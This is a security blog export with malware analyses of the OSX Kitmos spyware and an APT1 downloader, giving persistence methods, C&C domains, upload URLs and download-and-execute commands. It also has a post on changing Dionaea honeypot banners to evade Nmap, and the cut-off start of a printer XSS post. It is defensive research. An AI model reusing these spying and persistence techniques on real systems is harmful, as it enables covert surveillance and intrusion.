<a class="vt-p" href="https://www.botnets.fr/index.php/HangOver">https://www.botnets.fr/index.php/HangOver</a><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-50024834387506230542013-05-20T16:55:00.000+02:002013-05-24T00:28:46.795+02:00OSX Kitmos analysis<br />
On 16th of May, <a class="vt-p" href="https://twitter.com/5ean5ullivan">Sean Sullivan</a> has published an <a class="vt-p" href="http://www.f-secure.com/weblog/archives/00002554.html">article</a> on F-Secure blog about a new Mac OSX malware discovered on the Mac of an African activist by <a class="vt-p" href="https://twitter.com/ioerror">Jacob Appelbaum</a> during an Oslo Freedom Forum workshop.<br />
<br />
<h2>
File information</h2>
SHA1 hash : 4395a2da164e09721700815ea3f816cddb9d676e<br />
<br />
According to file Unix command, this binary is a Mach-o executable containing x86 and x64 code. VirusTotal repport of this binary can be found <a class="vt-p" href="https://www.virustotal.com/ru/file/6acd92d0dfe3e298d73b78a3dcc6d52ff4f85a70a9f2d0dcfe7ae4af2dd685cc/analysis/">here</a>. With a really quick look at the sample, we can see that it is not packed, obfuscated or encrypted.<br />
<br />
<h2>
C&C information</h2>
This sample contains two C&C url which in fact are at the moment pointing to the same server at IP 50.116.28.24 (This differs from F-Secure blog post, where IP addresses of both domains where different). This IP address points to Linode hosting company.<br />
<br />
A whois on "securitytable.org" reveals these (fake) information :<br />
<br />
Domain ID:D168053198-LROR<br />
Domain Name:SECURITYTABLE.ORG<br />
Created On:04-Mar-2013 06:58:36 UTC<br />
Last Updated On:16-May-2013 16:02:07 UTC<br />
Expiration Date:04-Mar-2014 06:58:36 UTC<br />
Sponsoring Registrar:PDR Ltd. d/b/a PublicDomainRegistry.com (R27-LROR)<br />
Status:CLIENT TRANSFER PROHIBITED<br />
Registrant ID:DI_26714386<br />
Registrant Name:Christopher<br />
Registrant Organization:N/A<br />
Registrant Street1:DE-10387<br />
Registrant Street2:Nairobi<br />
Registrant Street3:<br />
Registrant City:Nairobi<br />
Registrant State/Province:Central<br />
Registrant Postal Code:50563<br />
Registrant Country:KE<br />
Registrant Phone:+254.204973957<br />
Registrant Phone Ext.:<br />
Registrant FAX:<br />
Registrant FAX Ext.:<br />
Registrant Email:n.christopher@mail.ru<br />
<br />
Whois information of "docsforum.info" domain are similar.<br />
<br />
<h2>
IOC</h2>
All logged messages can be used to identify a compromised macintosh. For example, the following messages can be used as IOC :<br />
- " before ==%@"<br />
- "path == %@"<br />
- "path2===%@"<br />
- "Hellooo"<br />
- "Copy successful"<br />
- "Upload response %@"<br />
- "the path =%@"<br />
- "path1 =%@"<br />
- " Error - Statistics file upload failed: "%@""<br />
- " the array value =%@"<br />
- path to $HOME/MacApp<br />
- date in this format : "yy-MM-dd-HH:mm:ss"<br />
- ComputerName_UserName : $hostname-$username"<br />
- "Start file zip : %@"<br />
- "Start file zip : %@"<br />
- "Start file upload : %@"<br />
- "finished zipping file"<br />
- "finished uploading file"<br />
- "file path==%@"<br />
<br />
Network traffic can be useful too to identify a compromised Mac on your network. A compromised macintosh, will generate DNS requests to "securitytable.org" and "docsforum.info" domains which, at the time I'm writing these blog post resolves to 50.116.28.24. HTTP requests to "http://securitytable.org/lang.php" and "http://docsforum.info/lang.php" will also reveal the compromission.<br />
<br />
<h2>
Features</h2>
<h3>
sub_1E72</h3>
Function "sub_1E72" is responsible of the persistence of this malware. In fact, this function add the malware to the list of items to start at session login.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ea-4z6d17ir8Cn5FdPscqkocKJq2pw0cgvslsfpOvIodwSEYTwX9nW7n_vZX8PV0Kgn9Rb1fYUJwn-g6h1Y1mF9FfOTb13m-mvQV87nDbimlUkSO5JbKhQOOelpW4x9HeP6kObxC3gJ-/s1600/start_at_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="544" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ea-4z6d17ir8Cn5FdPscqkocKJq2pw0cgvslsfpOvIodwSEYTwX9nW7n_vZX8PV0Kgn9Rb1fYUJwn-g6h1Y1mF9FfOTb13m-mvQV87nDbimlUkSO5JbKhQOOelpW4x9HeP6kObxC3gJ-/s640/start_at_login.png" width="640" /></a></div>
<br />
<br />
<br />
- get malware bundle path thanks to NSBundle.bundlePath<br />
- call LSSharedFileListCreate with kLSSharedFileListSessionLoginItems as ListType in order to access to the list of applications starting when user logged on<br />
- call LSSharedFileListInsertItemURL to add the path to the malware bundle to the list<br />
<br />
PS : The malware is added to startup items of the current user only, if the malware author would like to start is program for all users on the system, he must use kLSSharedFileListGlobalLoginItems list type as LSSharedFileListCreate argument.<br />
<br />
More information about this technique can be found here : <a class="vt-p" href="http://cocoatutorial.grapewave.com/2010/02/creating-andor-removing-a-login-item/">http://cocoatutorial.grapewave.com/2010/02/creating-andor-removing-a-login-item/</a><br />
<br />
<h3>
cop</h3>
The first time the binary is executed, it copy itself to $HOME/<bundle_name><bundle_name>.app. Then, the sample calls "coml" function with the path to the new place (or its actual place, if it's not his first execution) as parameter. </bundle_name><br />
<br />
The call to "coml" will result of the execution of the following command : "/bin/sh -c open -a $HOME/<bundle_name>.app" (see coml & runSystemCommand below)<br />
<br />
<h3>
coml</h3>
Prepare "open -a $arg" NSString for "runSystemCommand" function.<br />
<br />
<h3>
runSystemCommand</h3>
Execute "/bin/sh -c $arg".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilB0YHLCgF5vA3volxHArUQepkzoolxTx7UConlIpXCw_d-4KG92ysJxsA7hMdwfhXFcq8iPxCLxZvzQBGCgqpEXC-G-6LgpetjsYpIooe1mkbmmiRYXPf3f5JGNdGCQ0dj8OVaaYCqy9R/s1600/run_cmd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilB0YHLCgF5vA3volxHArUQepkzoolxTx7UConlIpXCw_d-4KG92ysJxsA7hMdwfhXFcq8iPxCLxZvzQBGCgqpEXC-G-6LgpetjsYpIooe1mkbmmiRYXPf3f5JGNdGCQ0dj8OVaaYCqy9R/s640/run_cmd.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
- create a NSArray via arrayWithObjects method used as command line options for "sh" and containing : "-c" and runSystemCommand argument<br />
- create NSTask and call launchedTaskWithLaunchPath:arguments: method with "/bin/sh" and previous NSArray as argument<br />
<br />
<h3>
uploadRequestFinished</h3>
This function log some information like the response string received from the server or the path of the uploaded file. Then, the uploaded file is removed from the file system with a call to removeItemAtPath.<br />
<br />
<h3>
uploadRequestFailed</h3>
Log " Error - Statistics file upload failed: "%@"" where %@ is replaced by localizedDescription returned string.<br />
<br />
<h3>
sendRequestToServer</h3>
This function is sending hostname of the compromised macintosh to C&C server thanks to an HTTP request to http://docsforum.info/lang.php URL.<br />
<br />
- create "http://docsforum.info/lang.php" URL for ASIFormDataRequest<br />
- get hostname via NSProcessInfo.processInfo.hostName<br />
- call stringByReplacingOccurrencesOfString on hostname value to replace '.' by 'p'<br />
- log that new "hostname" string<br />
- add hostname value to the HTTP request as a POST data named "cname" (addPostValue function)<br />
- do the request w/ startAsynchronous<br />
<br />
NB : I don't know if this function is called somewhere as I haven't found any xref to this function<br />
<br />
<h3>
getscreenshot</h3>
This function is used to take screenshots w/ screencapture Mac OSX binary and save them in $HOME/MacApp directory. Name of the screenshot follow this format : "yy-MM-dd-HH:mm:ss.png". This function is first called inside applicationDidFinishLaunching function. Screenshots are saved every 20 seconds.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8wRLArVECuoZhJNqwqPViNbzv2DBiBQEIurVEUehqWdqXsyZuZLCIvogVe0FiqtuVg1ETUsqk_yhGbE5b6_oQHzl4CsDyeMK92ja6v-Yqp1Z5ue_CzLwT-XGf4k4Ty7CyGN9iTaD41DwX/s1600/takescreenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8wRLArVECuoZhJNqwqPViNbzv2DBiBQEIurVEUehqWdqXsyZuZLCIvogVe0FiqtuVg1ETUsqk_yhGbE5b6_oQHzl4CsDyeMK92ja6v-Yqp1Z5ue_CzLwT-XGf4k4Ty7CyGN9iTaD41DwX/s640/takescreenshot.png" width="640" /></a></div>
<br />
<br />
- create $HOME/MacApp path (with NSHomeDirectory, stringWithFormat functions)<br />
- this path will be log in Apple System Log via NSLog<br />
- use the shared file manager to play with FS (via NSFileManager.defautlManager)<br />
- check if the path exists (via fileExistsAtPath)<br />
- If it doesn't exist, create directory with createDirectoryAtPath<br />
- get date string with this format "yy-MM-dd-HH:mm:ss" (via NSDate, NSDateFormatter, setDateFormat, stringFromDate) // the date format is different from F-secure screenshot. here, use of ':' instead of '/' on F-Secure screenshot<br />
- date is logged (NSLog)<br />
- create string $HOME/MacApp/yy-MM-dd-HH:mm:ss.png<br />
- create a NSTask object to run a program as a subprocess<br />
- defines the executable path to "<a class="vt-p" href="http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/screencapture.1.html">/usr/sbin/screencapture</a>" via setLaunchPath<br />
- arguments are passed to screenshot via setArguments<br />
/usr/sbin/screencapture -x -T 20 $HOME/MacApp/yy-MM-dd-HH:mm:ss.png : take a screenshot without any sound after a 20 seconds delay and save it to the aforementioned path<br />
- task is launched via launch method<br />
- to finish, uploadImage function is called<br />
<br />
<h3>
uploadImage</h3>
This function is used to upload screenshots to "http://securitytable.org/lang.php"<br />
<br />
- create NSUrl object with string "http://securitytable.org/lang.php" and use it to create an ASIFormDataRequest<br />
- create MacApp directory path string and log it (like in getscreenshot function)<br />
- get the hostname of the computer, thanks to "hostname" method of NSProcessInfo object (process information agent of the process)<br />
- check that the path to MacApp folder exists. Go to end of the function if not<br />
- count the number of files/screenshots w/ contentsOfDirectoryAtPath and use count function on the returned string array<br />
- log the number of files/screenshots<br />
- get first file of the list<br />
- log " the array value =%@" where %@ is replaced by the name of the first file<br />
- If ".DS_Store" exists, remove it from the file array<br />
- Loop to take and upload screenshot<br />
- create NSData with content of each file/screenshot (via initWithContentsOfFile)<br />
- call ASIFormDataRequest.addPostValue function and set $hostname data to key "cname"<br />
- second call to addPostValue with key "name" and value : path to the screenshot<br />
- then call to setData ("setData:withFileName:andContentType:forKey:")<br />
key : userfile<br />
content type : image/png<br />
filename : path to the screenshot<br />
data : file content (screenshot)<br />
- upload the file/screenshot<br />
- call getscreenshot function<br />
<br />
<h2>
Summary</h2>
This Mac OSX malware is really simple. It has only few features :<br />
- start at user login<br />
- take screenshot<br />
- upload screenshot<br />
<br />
In addition, it is absolutely not stealth as screenshots are saved in $HOME/MacApp directory of the infected user. No advanced malware techniques/features (packing, encryption, obfuscation) have been seen in this sample.<br />
<br />
<h2>
Refs</h2>
<a class="vt-p" href="https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc">https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc</a><br />
<a class="vt-p" href="http://www.f-secure.com/weblog/archives/00002554.html">http://www.f-secure.com/weblog/archives/00002554.html</a><br />
<a class="vt-p" href="http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/">http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/</a><br />
<div>
<a class="vt-p" href="https://www.botnets.fr/index.php/HangOver">https://www.botnets.fr/index.php/HangOver</a><br />
<br /></div>
<div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com1tag:blogger.com,1999:blog-6555208034441643895.post-14041831463395513512013-04-01T00:05:00.000+02:002013-04-01T18:31:32.866+02:00Analysis of an APT1 binary<div style="text-align: justify;">
In middle of February, Mandiant has released a huge <a class="vt-p" href="http://intelreport.mandiant.com/" target="_blank">report</a> about cyber threat from Chinese government. Some of the technical details has been disclosed in Appendix C ("The Malware Arsenal") of their report.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Because of this APT buzz, I decided to take a look on one of the binary mentioned in APT1 report in order to know the level of this cyber threat.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After running a script on around 200 samples from APT1, I decided to analyse the binary which look the most strange. Report on VT can be found <a class="vt-p" href="https://www.virustotal.com/fr/file/e688090626629f14ce10a5eba1e122ceb6bf4bb60e4a66664e337bb793bbc80e/analysis/" target="_blank">here</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii_Z1HbQnSGKWZEmFOJV3H1rdNtDy_OIef_DskjEdBAIjUdxKcW1nD7hvTGJFPRqz3OeHJgzlcf3orDFMGZ9SCOVdL-5xDqNazgN4AhO6q76j6B0u85wTILoVpvCCkfa6DZGwGUQYpkBNO/s1600/peid.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: justify;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii_Z1HbQnSGKWZEmFOJV3H1rdNtDy_OIef_DskjEdBAIjUdxKcW1nD7hvTGJFPRqz3OeHJgzlcf3orDFMGZ9SCOVdL-5xDqNazgN4AhO6q76j6B0u85wTILoVpvCCkfa6DZGwGUQYpkBNO/s320/peid.png" width="320" /></a></div>
<br />
<div style="text-align: justify;">
According to PeID, this binary is not packed but it has 4 ".upx" sections and the OEP is pointing to the </div>
<div style="text-align: justify;">
last ".upx" section which is not a normal behavior. The few functions in the import table, the few strings in the binary and a high entropy in all sections confirm that point, the binary is packed! I thought interesting to take a look on this binary in order to understand and maybe discover the packer used as PeID failed to identify it.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Unpacking</h2>
<div style="text-align: justify;">
Beginning of the packed code (in last .upx section : 0x8000) contains a lot of junk code. After these useless instructions, a loop is used to modify the code which follow the loop. The code after this loop is used to get addresses of <i>LoadLibrary</i> and <i>GetProcAddress</i> thanks to the ImportTableAddress field of the loaded PE file.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<i>LoadLibrary</i> is then used to load "<i>kernel32.dll</i>" and <i>GetProcAddress</i> to get addresses of the following functions :</div>
<div style="text-align: justify;">
<i>GetModuleHandleA, VirtualProtect, GetModuleFileNameA, CreateFileA, GlobalAlloc, GlobalFree, ReadFile, GetFileSize, CloseHandle, CreateSemaphoreA, ReleaseSemaphore, Sleep, WaitForSingleObject, CreateThread</i></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After the resolution of these functions, SizeOfImage in PEB->PEB_LDR_DATA->InLoadOrderModuleList is set to 1000 (previous value was 9000). Then, <i>VirtualProtect</i> is called in order to change access to ImageBase of the binary to PAGE_READWRITE.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Then some strings will be decoded from memory before being used for example to load library "<i>kernel32.dll</i>" again and then resolve addresses of <i>VirtualProtect, VirtualAlloc,VirtualFree</i>. As soon as the string has been used by <i>LoadLibraryA</i> or <i>GetProcAddress</i>, the string is replaced by several 0 in memory. With this kind of protection, the process contains few information in memory, so a dump of the actual process memory will be not really interesting for an analyst.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Then, code jumps to the third section (.upx 0x7000) which do similar stuff. Idem for the second .upx section.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The first .upx at RVA 0x5000 (but the last called, as order is reversed) will do similar stuff than previous sections but as this is the last packed section, these actions should be more interested for the unpacked binary.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In fact, this last .upx section will load all DLL used by the final (unpacked) binary and will resolve addresses of all functions :</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
kernel32.dll : <i>CreateProcess, GetLongPathNameA, GetTempPathA, Sleep, CloseHandle, GetModuleHandleA, GetCommandLineA, GetModuleFileNameA, GetProcAddress, LoadLibraryA, ExitProcess</i></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
LZ32.dll : <i>LZCopy, LZOpenFileA, LZClose</i></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
MSVCRT.dll : <i>strstr, strncmp, atoi ...</i></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
ADVAPI32.dll : <i>RegSetValueExA, RegCreateKeyExA, RegCloseKey</i></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Then code jump in .text section, and OEP is then correct.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This packer uses several tricks to annoy the disassembler/analyst like some jumps in middle of an instruction, "push eax; retn", always true comparison ... but nothing to detect the presence of a debugger or a VM.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheHxRGE7xddH9fMd8XAc6bhg89zD0cD9dIajbhsbMIMTefFkLt7dFV7D1HT75zXrQsPoOp9E-P7Sosgq_duf7ydOUDhM1QCDxAqm8yZ3JJ7BfJED154j8FYTBoletCRQo9AYhdFUb7Zhcd/s1600/jmp_mid_instruction.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheHxRGE7xddH9fMd8XAc6bhg89zD0cD9dIajbhsbMIMTefFkLt7dFV7D1HT75zXrQsPoOp9E-P7Sosgq_duf7ydOUDhM1QCDxAqm8yZ3JJ7BfJED154j8FYTBoletCRQo9AYhdFUb7Zhcd/s1600/jmp_mid_instruction.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Malware features</h2>
<div style="text-align: justify;">
After unpacking, this binary is in fact a simple downloader. The binary try to confuse IDA with lots of "JZ/JNZ" jumps. In fact, nearly all jumps are using this trick.</div>
<div style="text-align: justify;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4x1Duxjsih0gc3v2ysf85sVayF_4VEzFGn3a8IUMs_D56x4Bfns6LleVUdYbsNTOOGgCOyxuxDrPWNhHbLHApPJFBm7-7mH53T-tQhihJoAXbHPlpaDXIQSfIDEJEomgEKWVzs0uGXqO/s1600/unpacked_anti-disasm.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4x1Duxjsih0gc3v2ysf85sVayF_4VEzFGn3a8IUMs_D56x4Bfns6LleVUdYbsNTOOGgCOyxuxDrPWNhHbLHApPJFBm7-7mH53T-tQhihJoAXbHPlpaDXIQSfIDEJEomgEKWVzs0uGXqO/s400/unpacked_anti-disasm.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IDA confused</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1iTgz1Zmh0hS_eVoXmJdTwkEnmrFFKzybqkn_dtZiMeV_6YTwlkEk8yT6Y8UHKQmG7kzbxNnIwVntnuNAmIfaRc3TVzbMIGMmbN93pj0v_FgdxltsLSHnv3jyNhwo2oQTXsxAk67qh_Kw/s1600/unpacked_anti-disasm2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1iTgz1Zmh0hS_eVoXmJdTwkEnmrFFKzybqkn_dtZiMeV_6YTwlkEk8yT6Y8UHKQmG7kzbxNnIwVntnuNAmIfaRc3TVzbMIGMmbN93pj0v_FgdxltsLSHnv3jyNhwo2oQTXsxAk67qh_Kw/s400/unpacked_anti-disasm2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Disassembly fixed</td></tr>
</tbody></table>
<div style="text-align: justify;">
The first function called by the unpacked code is used to resolve addresses of network functions. "<i>wininet.dll</i>" library is loaded at runtime with <i>LoadLibrary</i> and then <i>InternetOpenUrlA, InternetOpenA, InternetCloseHandle</i> and <i>InternetReadFile</i> functions addresses are resolved thanks to <i>GetProcAddress</i>. Address of <i>UrlDownloadToFileA</i> from "<i>urlmon.dll</i>" is also resolved with the same method.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The second function used is to assure reboot persistence to the malware. In order to run after a reboot, this malware add an entry to the registry :</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]</div>
<div style="text-align: justify;">
"McUpdate"="path_to_this_binary<path_to_this_malware>"</path_to_this_malware></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Key and subkey values are not stored in clear text in the file but are encoded with a xor algorithm. The following python script decodes all encoded strings used in this binary :</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<script src="https://gist.github.com/steeve85/5281785.js"></script><br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Then malware contacts its C&C to get an order. URL is encoded with the aforementioned algorithm. After decoding, URL is : http://216.15.210.68/197.1.16.3_7.html. After decoding, User-Agent used to connect to the C&C is "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)". If it can't contact the C&C, it will wait 10 minutes before retry. After 3 fails to get a command from the C&C, the binary ends its execution.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Commands on the C&C server are between "<!-- DOCHTML<!-- DOCHTML" and "-->" and "-->" HTML tags. These two tags like the following commands are also encoded in the binary. Command can be one of the following :</div>
<div style="text-align: justify;">
- Ausov : Exit the program</div>
<div style="text-align: justify;">
- Author X : Wait X * 10 minutes</div>
<div style="text-align: justify;">
- http://url<url> : url <url>used to download and execute an other binary.</url></url></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
When the last command is obtained from C&C, the file pointed by the url <url>is downloaded to the temporary folder thanks to <i>UrlDownloadToFile</i> function. As the downloaded file can be compressed by <a class="vt-p" href="http://en.wikipedia.org/wiki/Lempel-Ziv-Welch" target="_blank">Lempel-Ziv</a> algorithm, the malware opens the downloaded file with <i>LZOpenFile</i>. An other file is created with nearly the same path than the first file opened : ".exe" extension is added at the end. Then, content from the first file (the downloaded one) is copied (and decompressed if necessary) to the second thanks to <i>LZCopy</i> function.</url></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After that, the copied (and uncompressed) file is executed with <i>CreateProcessA</i>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After analysis, the aim of this malware is simple : download and execute (more advanced?) binaries on the victim computer. This malware seems to be one of the WEBC2-AUSOV family defined by Mandiant as "Ausov" is a command of this sample.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I have not being able to identify the packer used. So if you recognized it, feedback will be welcome ;-)</div>
<div style="text-align: justify;">
<br /></div>
<br /><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-27666214601173673602012-06-10T13:46:00.000+02:002012-07-03T01:04:49.893+02:00Make Dionaea stealthier for fun and no profit<div style="text-align: justify;">
I'm in my "honeypot playing period" and I've tried to scan my <a class="vt-p" href="http://dionaea.carnivore.it/" target="_blank">Dionaea</a> with Nmap which detect of course lots of port listening but more annoying, last versions of Nmap are able to see that some services are provided by Dionaea ...</div>
<br />
<script src="https://gist.github.com/2902618.js?file=dionaea_scan1">
</script><br />
<br />
<div style="text-align: justify;">
So if you want your Honeypot to be stealthier you can apply some tricks. Before to modify Dionaea services behavior, you have to know how Nmap services fingerprint feature works (I will only speak about Nmap, because that's the most used ports scanner, it's up to you to try with others).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In order to be able to discover the name and version of a service, Nmap use Perl Compatible Regular Expressions. All these regexp are stored in <i>/usr/share/nmap/nmap-service-probes</i> (path can change according to OS). If you want to understand nmap-service-probes file's syntax, I recommend you to read <a class="vt-p" href="http://nmap.org/book/vscan-fileformat.html" target="_blank">this</a>. Below, some probes extracted from this file :</div>
<br />
<script src="https://gist.github.com/2902651.js?file=nmap_probes">
</script><br />
<br />
<div style="text-align: justify;">
So if we want to hide our Dionaea honeypot from Nmap users, we have to modify Dionaea behavior to unmatch Nmap probes. First, list all Dionaea probes of this file :</div>
<br />
[steeve@omega ~]$ <i>cat /usr/share/nmap/nmap-service-probes | grep Dionaea</i><br />
<br />
<script src="https://gist.github.com/2902656.js?file=dionaea_probes">
</script><br />
<br />
<div style="text-align: justify;">
We can see that Nmap is able to detect "only" 4 services offered by Dionaea : FTP, HTTP, MSSQL and SMB. I will show you how we can deceive Nmap by modifying few files in Dionaea. I won't show you how to tweak MSSQL service because I haven't make deeper and this service looks a bit more complicated ... (If you have a solution, you can send me a mail or share in comments :-) </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
First, if we look at the FTP probe, we can see that Nmap only checks the connection banner. So we just have to change it, and Nmap will be lost in its attempt to retrieve service name and version. For sure we can put any banner, but the best thing to do (in my opinion) is to try to act like a real <a class="vt-p" href="http://en.wikipedia.org/wiki/List_of_FTP_server_software" target="_blank">FTP server</a>. Shodan is a great tool to help us to know how to simulate FTP servers, check <a class="vt-p" href="http://www.shodanhq.com/search?q=+port%3A21" target="_blank">this link</a>. I have choose to use MS FTP banner : "<i>Microsoft FTP Service</i>".</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So we have to edit the Ftp python file located in : <i>/opt/dionaea/lib/dionaea/python/dionaea/ftp.py</i>. Now you just have to replace "Welcome to the ftp service" by the banner of your choice :</div>
<br />
<script src="https://gist.github.com/2902800.js?file=nmap_dionaea_ftp">
</script><br />
<br />
<div style="text-align: justify;">
If we check HTTP Nmap probe, we can see that's a static one, no regexp used. This probe is based on HTTP headers and HTML source code. There is at least two simple solutions. We can see that HTTP service lists the directory content, so first we can decide to simply put a file in <i>/opt/dionaea/var/dionaea/wwwroot</i> directory, and HTML source code will be different and won't check probe anymore. The second solution is to modify the HTML code sent by Dionaea in <i>/opt/dionaea/lib/dionaea/python/dionaea/http.py</i>. For example, in list_directory(), we can change DTD, title page ...</div>
<br />
<script src="https://gist.github.com/2902817.js?file=nmap_dionaea_http">
</script><br />
<br />
<div style="text-align: justify;">
SMB probe provided by Nmap is based on the value of two fields of the SMB Negotiate Protocol Response : "OemDomainName" and "ServerName". Nmap expects to receive respectively "WORKGROUP" and "HOMEUSER-XXXXXX" where X represent random data. It seems quite easy to mislead Nmap on SMB service too. We just have to modify those values in SMB_Negociate_Protocol_Response class of file <i>/opt/dionaea/lib/dionaea/python/dionaea/smb/include/smbfields.py</i>. Let's try with "HINMAP" and "TRYHARDER".</div>
<br />
<script src="https://gist.github.com/2902847.js?file=nmap_dionaea_smb">
</script><br />
<br />
<div style="text-align: justify;">
You can see results of our tricks just below. Sure, that's not perfect but it's better than nothing ;-)</div>
<div style="text-align: justify;">
<br /></div>
<script src="https://gist.github.com/2902861.js?file=nmap_scan2">
</script><br />
<br />
<div style="text-align: justify;">
In this blog post, I've shown you how to use Nmap probes to "protect" your honeypot, but you can do the opposite adding new probes to get a more powerfull Nmap. In addition, it will be interesting to modify MSSQL behavior and SSL certificates to obtain a no verbose honeypot (look at the first scan for SSL certificates details).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
FYI : Markus, Dionaea's creator, won't fix Dionaea regarding to Nmap (or other scanners) possible detection. It's a cat-and-mouse game that he can't win because some protocols are tricky to implement and modify whereas Nmap probes are very easy to add. You can read <a class="vt-p" href="http://sourceforge.net/mailarchive/message.php?msg_id=29067712" target="_blank">this mail</a> on Nepenthes mailing list.</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com5tag:blogger.com,1999:blog-6555208034441643895.post-62119801083968841322012-04-23T23:16:00.000+02:002012-04-23T23:16:14.736+02:00XSS on HP printer web interface<div style="text-align: justify;">
Yesterday I was watching a Defcon 19 <a class="vt-p" href="http://www.securitytube.net/video/2994" target="_blank">talk</a> about multi-function printer security which was pretty fun. So this give me an idea : what about mine ? For sure, I have not a professional printer which can be connected to an LDAP or whatever, but my printer (HP Deskjet 3070A) has network access too :)</div>
<div style="text-align: justify;">
<br /></div>
According to Nmap, lots of TCP port seem opened :<br />
<br />
<i>Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-22 21:16 CEST
</i><br />
<i>Nmap scan report for HP7D7AA8 (192.168.1.23)</i><br />
